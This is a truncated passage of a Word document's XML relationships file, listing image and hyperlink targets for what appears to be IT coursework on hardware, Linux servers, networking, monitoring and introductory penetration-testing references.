Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId370" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.nksc.lt/pranesti.html" TargetMode="External"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linuxhint.com/install_centos8_virtualbox/" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.lifewire.com/how-to-fix-a-computer-that-wont-turn-on-2624450" TargetMode="External"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image63.png"/><Relationship Id="rId328" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=3TPsuio8PP8" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.techyv.com/blog/top-10-open-source-help-desk-software/" TargetMode="External"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId381" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.slavasoft.com/download.htm" TargetMode="External"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.redhat.com/" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://motionarray.com/learn/davinci-resolve/davinci-resolve-system-requirements/" TargetMode="External"/><Relationship Id="rId283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image74.png"/><Relationship Id="rId339" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.archive.org" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/channel/UCP2uPp7TUXwJCicB0byzDnQ" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/tos" TargetMode="External"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisco.com/c/en/us/products/collateral/switches/catalyst-2960-plus-series-switches/data_sheet_c78-728003.html" TargetMode="External"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://networklessons.com/switching/intervlan-routing" TargetMode="External"/><Relationship Id="rId350" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.neweggbusiness.com/smartbuyer/over-easy/5-free-tools-to-draw-a-network-diagram/" TargetMode="External"/><Relationship Id="rId406" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ekahau.com/solutions/wi-fi-heatmaps/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://repo.zabbix.com/zabbix/5.0/rhel/8/x86_64/zabbix-release-5.0-1.el8.noarch.rpmdnf" TargetMode="External"/><Relationship Id="rId392" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com/db/modules/exploit/unix/irc/unreal_ircd_3281_backdoor/" TargetMode="External"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9746" TargetMode="External"/><Relationship Id="rId294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.amd.com/en/products/processors-desktop" TargetMode="External"/><Relationship Id="rId308" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://techlog360.com/ddr1-ddr2-ddr3-ddr4-ram-differences/" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/List_of_MediaTek_processors" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.archive.org" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.rapid7.com/metasploit/metasploitable-2/" TargetMode="External"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ui.com/unifi/unifi-ap-ac-lr/" TargetMode="External"/><Relationship Id="rId361" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/" TargetMode="External"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gadgetsexplorer.com/2019/10/08/whats-the-difference-between-ddr2-ddr3-and-ddr4-ram/" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://computingforgeeks.com/install-and-configure-iis-web-server-on-windows-server/" TargetMode="External"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.jpg"/><Relationship Id="rId319" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/en-us/wdsi/threats" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kb.acronis.com/content/65468" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.exploit-db.com/download/8572" TargetMode="External"/><Relationship Id="rId330" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.apple.com/legal/internet-services/icloud/en/terms.html" TargetMode="External"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId372" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.infotechram.com/index.php/2019/12/30/how-to-install-system-center-service-manager-2019/" TargetMode="External"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image65.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.logicalincrements.com/articles/building-pc-3d-rendering-animation" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fosslinux.com/7705/how-to-install-and-configure-zabbix-on-centos-7.htm" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.computerhope.com/issues/ch000179.htm" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://information.rapid7.com/metasploitable-download.html" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.predictiveanalyticstoday.com/top-free-open-source-helpdesk-software/" TargetMode="External"/><Relationship Id="rId320" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.linuxbabe.com/redhat/install-nextcloud-rhel-8-centos-8-nginx-lemp" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/system-center/scsm/incident-mgt?view=sc-sm-2019" TargetMode="External"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.katalita.lt/details/ubiquiti-unifi-video-camera-nvr-2tb.html" TargetMode="External"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://techlog360.com/ddr1-ddr2-ddr3-ddr4-ram-differences/" TargetMode="External"/><Relationship Id="rId341" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.netacad.com/courses/packet-tracer/introduction-packet-tracer" TargetMode="External"/><Relationship Id="rId362" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://upcloud.com/community/tutorials/install-nextcloud-centos/" TargetMode="External"/><Relationship Id="rId383" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://resources.infosecinstitute.com/topic/installing-configuring-centos-7-virtualbox/" TargetMode="External"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.tecmint.com/linux-network-configuration-and-troubleshooting-commands" TargetMode="External"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.jpg"/><Relationship Id="rId285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.intel.com/content/www/us/en/products/processors/core.html" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.solidworks.com/support/system-requirements" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kb.acronis.com/content/61645" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.apple.com/legal/internet-services/icloud/en/terms.html" TargetMode="External"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2447" TargetMode="External"/><Relationship Id="rId310" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec/" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.microsoft.com/en-us/windows/tips-to-improve-pc-performance-in-windows-10-b3b3ef5b-5953-fb6a-2528-4bbed82fba96" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.isecom.org/OSSTMM.3.pdf" TargetMode="External"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisco.com/en/US/docs/switches/lan/catalyst2970/hardware/quick/guide/2970GSG2.html" TargetMode="External"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.metageek.com/products/rampart-home/" TargetMode="External"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.lifewire.com/wireshark-tutorial-4143298" TargetMode="External"/><Relationship Id="rId331" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://community.cisco.com/t5/other-network-architecture/impact-of-frequent-power-outtage-to-catalyst-switches/td-p/360510" TargetMode="External"/><Relationship Id="rId352" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=lqjrF7f_eI4" TargetMode="External"/><Relationship Id="rId373" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://social.technet.microsoft.com/wiki/contents/articles/52765.windows-server-2019-step-by-step-setup-active-directory-environment-using-powershell.aspx" TargetMode="External"/><Relationship Id="rId394" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/Msfconsole/" TargetMode="External"/><Relationship Id="rId408" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.wireshark.org" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item1.xml"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.slavasoft.com/download.htm" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cgdirector.com/best-computer-for-animation/" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bestmonitoringtools.com/how-to-install-zabbix-server-on-centos-or-rhel/" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sourceforge.net/projects/metasploitable/" TargetMode="External"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image66.png"/><Relationship Id="rId296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ccleaner.com/knowledge/why-your-pc-is-so-slow-and-how-you-can-speed-it-up" TargetMode="External"/><Relationship Id="rId300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/system-center/scsm/incident-mgt?view=sc-sm-2019" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://askme4tech.com/acronis-true-image-2020-review-tutorial" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://community.netgear.com/t5/Nighthawk-WiFi-Routers/Router-wifi-settings-gone-after-power-outage/td-p/1667153" TargetMode="External"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.tecmint.com/data-center-server-management-tools/" TargetMode="External"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://store.ui.com/collections/unifi-protect-cameras/products/unifi-video-camera-g3-dome" TargetMode="External"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.computernetworkingnotes.com/ccna-study-guide/vlan-practice-lab-setup-in-packet-tracer.html" TargetMode="External"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.lanner-america.com/blog/types-motherboard-form-factors/%23:~:text=The%20form%20factor%20determines%20the,pico%2DATX%2C%20and%20further." TargetMode="External"/><Relationship Id="rId321" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.isecom.org/OSSTMM.3.pdf" TargetMode="External"/><Relationship Id="rId342" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lt.phhsnews.com/how-do-ip-addresses-work5759" TargetMode="External"/><Relationship Id="rId363" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tools.kali.org/password-attacks/hydra" TargetMode="External"/><Relationship Id="rId384" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.seagate.com/gb/en/support/kb/the-bios-does-not-detect-or-recognize-the-ata-sata-hard-drive-168595en/" TargetMode="External"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linuxhint.com/install_centos8_virtualbox/" TargetMode="External"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://computingforgeeks.com/install-and-configure-iis-web-server-on-windows-server/" TargetMode="External"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.deepcool.com/product/dcoolingaccessory/vga/2013-12/45_604.shtml" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://knowledge.autodesk.com/support/maya/learn-explore/caas/sfdcarticles/sfdcarticles/System-requirements-for-Autodesk-Maya-2020.html" TargetMode="External"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.png"/><Relationship Id="rId286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cpu-world.com/CPUs" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.zabbix.com/documentation/5.0/manual/installation/install_from_packages/rhel_centos" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dropbox.com/terms2014" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.samba.org/samba/security/CVE-2007-2447.html" TargetMode="External"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/lt-lt/microsoft-365/business-insights-ideas/resources/tips-for-mapping-your-network-diagram?SilentAuth=1" TargetMode="External"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ekahau.com/solutions/wi-fi-heatmaps/" TargetMode="External"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.howtogeek.com/104278/how-to-use-wireshark-to-capture-filter-and-inspect-packets/" TargetMode="External"/><Relationship Id="rId311" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virtualbox.org/wiki/Downloads" TargetMode="External"/><Relationship Id="rId332" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://instagram.com/legal/terms/" TargetMode="External"/><Relationship Id="rId353" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://resources.infosecinstitute.com/topic/owasp-top-10-tools-and-tactics/" TargetMode="External"/><Relationship Id="rId374" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/lotus-fruit/top-10-operating-systems-for-ethical-hackers-and-penetration-testers-2020-list-b523b611cdbb" TargetMode="External"/><Relationship Id="rId395" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/exchange/high-availability/disaster-recovery/windows-server-backup?view=exchserver-2019" TargetMode="External"/><Relationship Id="rId409" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.zabbix.com/documentation/5.0/manual/installation/install_from_packages/rhel_centos" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/system-center/scsm/install-one-computer?view=sc-sm-2019" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/en-us/wdsi/threats" TargetMode="External"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bestmonitoringtools.com/how-to-install-zabbix-server-on-centos-or-rhel/" TargetMode="External"/><Relationship Id="rId234"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www.cgdirector.com/best-computer-3d-modeling-rendering/" TargetMode="External"/><Relationship Id="rId255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image67.png"/><Relationship Id="rId297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-cert.cisa.gov/" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/Msfconsole/" TargetMode="External"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.tecmint.com/datacenter-server-room-assets-management-with-racktables-linux/" TargetMode="External"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://store.ui.com/collections/unifi-protect-cameras/products/unifi-video-camera-g3-bullet" TargetMode="External"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.computernetworkingnotes.com/ccna-study-guide/configure-vtp-server-and-client-in-switch.html" TargetMode="External"/><Relationship Id="rId301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.computernetworkingnotes.com/ccna-study-guide/configure-vtp-server-and-client-in-switch.html" TargetMode="External"/><Relationship Id="rId322" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.howtogeek.com/104278/how-to-use-wireshark-to-capture-filter-and-inspect-packets/" TargetMode="External"/><Relationship Id="rId343" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tech4fresher.com/best-wifi-analyzer-for-windows/" TargetMode="External"/><Relationship Id="rId364" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://vitux.com/install-centos-with-virtualbox-on-windows/" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://community.cisco.com/t5/routing/rv340-lost-his-configuration-after-power-outage/td-p/4097598" TargetMode="External"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.stonerefurb.co.uk/form-factors-explained" TargetMode="External"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId385" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.seagate.com/gb/en/support/kb/the-bios-does-not-detect-or-recognize-the-solid-state-drive-005707en/" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linuxhint.com/install_centos8_virtualbox/" TargetMode="External"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.tecmint.com/linux-network-configuration-and-troubleshooting-commands/" TargetMode="External"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.png"/><Relationship Id="rId287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.qualcomm.com/products/processors" TargetMode="External"/><Relationship Id="rId410" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://academyofanimatedart.com/a-guide-to-the-best-computer-for-3d-modeling-and-rendering/" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://windows.microsoft.com/en-us/windows/microsoft-services-agreement" TargetMode="External"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tools.kali.org/password-attacks/hydra" TargetMode="External"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.neweggbusiness.com/smartbuyer/over-easy/5-free-tools-to-draw-a-network-diagram/" TargetMode="External"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.freedownloadmanager.org/Windows-PC/Ekahau-HeatMapper-FREE.html" TargetMode="External"/><Relationship Id="rId312" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dropbox.com/terms2014" TargetMode="External"/><Relationship Id="rId333" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v" TargetMode="External"/><Relationship Id="rId354" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.rapid7.com/metasploit/msf-overview/" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dskoli.in/blog/windows-server-2019-with-desktop-experience-full-interface-clean-installation" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.infotechram.com/index.php/2019/12/30/how-to-install-system-center-service-manager-2019/" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.nksc.lt/pranesti.html" TargetMode="External"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.jpg"/><Relationship Id="rId375" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://community.netgear.com/t5/Nighthawk-WiFi-Routers/Router-wifi-settings-gone-after-power-outage/td-p/1667153" TargetMode="External"/><Relationship Id="rId396" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.computernetworkingnotes.com/ccna-study-guide/vlan-configuration-commands-step-by-step-explained.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item3.xml"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image68.png"/><Relationship Id="rId298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisco.com/c/en/us/products/routers/product-listing.html" TargetMode="External"/><Relationship Id="rId400" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.transcend-info.com/Support/FAQ-296" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/" TargetMode="External"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.tecmint.com/ip-address-management-tools-for-linux/" TargetMode="External"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/lt-lt/microsoft-365/business-insights-ideas/resources/tips-for-mapping-your-network-diagram?SilentAuth=1" TargetMode="External"/><Relationship Id="rId302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.corel.com/hc/en-us/articles/219326157-CorelDRAW-Graphics-Suite-X8-System-Requirements" TargetMode="External"/><Relationship Id="rId323" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.logicalincrements.com/" TargetMode="External"/><Relationship Id="rId344" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://computingforgeeks.com/install-and-configure-iis-web-server-on-windows-server/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://vitux.com/install-centos-with-virtualbox-on-windows/" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.drivereasy.com/knowledge/fixed-bios-not-detecting-ssd-in-computer/" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://community.cisco.com/t5/other-network-architecture/impact-of-frequent-power-outtage-to-catalyst-switches/td-p/360510" 